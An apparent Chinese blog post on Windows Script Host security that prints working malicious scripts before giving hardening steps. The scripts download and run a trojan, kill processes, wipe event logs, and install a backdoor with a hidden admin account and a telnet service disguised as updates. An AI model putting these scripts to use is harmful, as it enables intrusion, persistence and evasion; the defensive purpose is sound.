WSH环环相扣的安全设置
WSH安全
WSH -- "Windows Scripting Host"。
内嵌于Windows操作系统中的脚本语言工作环境。
编写一个后缀为.vbs或.js的脚本文件,然后运行,这是,系统会自动调用Windows Scripting Host,即Wscript.exe(若是在命令行下,则为Csript.exe)
攻击者常用wsh来执行一些恶意操作。
常见的几种Wsh恶意程序
1、http下载木马并运行
Set xPost=CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.***/muma.exe",0 xPost.Send() Set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "muma.exe",2 set ws=wscript.createobject("wscript.shell") ws.run "muma.exe/start",0
2、列举进程
@echo for each ps in getobject_>ps.vbs @echo("winmgmts:\\.\root\cimv2:win32_process").instances_>>ps.vbs @echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next>>px.vbs # 用法:csript ps.vbs
3、终止进程
@echo for each ps in getobject_>pskill.vbs @echo ("winmgmts:\\.\root\cimv2:win32_process").instances_>>pskill.vbs @echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next>>pskill.vbs # 用法:csript pskill.vbs pid
4、利用脚本编程删除日志
strComputer="." Set objWMIService = GetObject("winmgmts:"_& "{impersonationLevel=impersonate,(Backup)}!\\"&_strComputer & "\root\cimv2") dim mylogs(3) mylogs(1)="application" mylogs(2)="system" mylogs(3)="security" for Each logs in mylogs set colLogFiles=objWMIService.Execdy_("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'") For Each objLogfile in colLogFiles objLogFile.ClearEventLog() Next Next
5、Vbs后门
dim wsh set wsh=Wscript.CreateObject("wscript.shell") set wshshell=createobject("wscript.shell") a=wshshell.run("netsh firewall set portopening TCP 23 ENABL",0) # 让XP防火墙对23端口放行 b=wshshell.run("sc config tlntsvr start=auto",0) # 把telnet改为手动 d=wshshell.run("net1 user a$ a /add",0) e=wshshell.run("net1 localgroup administrators a$ /add",0) f=wshshell.run("cmd /k copy ""%systemroot%\system32\tlntsvr.exe""""%systemroot%\java\rundll32.exe""",0) # 复制telnet到java目录下改名为rundll32.exe g=wshshell.run("sc create ccservice binpath=""%systemroot%\java\rundll32.exe""type=own",0) # sc命令用服务的方式启动 h=wshshell.run("sc config ccservice DisplayName=Automatic Updates",0) i=wshshell.run("sc description ccservice 通知所选用户和计算机有关系统管理级警报。",0) j=wshshell.run("sc config ccservice start=auto",0) k=wshshell.run("net1 start ccservice",0) z=wshshell.run("ATTRIB +R +S +H ""%systemroot%\java\rundll32.exe""",0) wsh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\a$",0,"REG_DWORD"
WSH安全设置
1、 注销相关ocx文件并设置ocx权限
a) 注销wsh组建文件:regsvr32/u C:\WINDOWS\system32\wshom.ocx
b) 禁止Guest用户使用shell32.dll来防止调用此组件:cacls C:\WINDOWS\system32\wshom /e /d guests
2、 csript.exe的禁用
a) 改名
b) ntfs禁止
3、 注册表禁用相关选项
a) HKEY_CALSSES_ROOT\WScript.shell\及HKEY_CLASSES_ROOT\WScript.shell.1\改名为其他的名字,
b) 将clsid值也改一下
HKEY_CALSSES_ROOT\WScript.shell\CLSID项目的值和HKEY_CLASSES_ROOT\WScript.shell.1\CLSID项目的值也可以将其删除。
浙公网安备 33010602011771号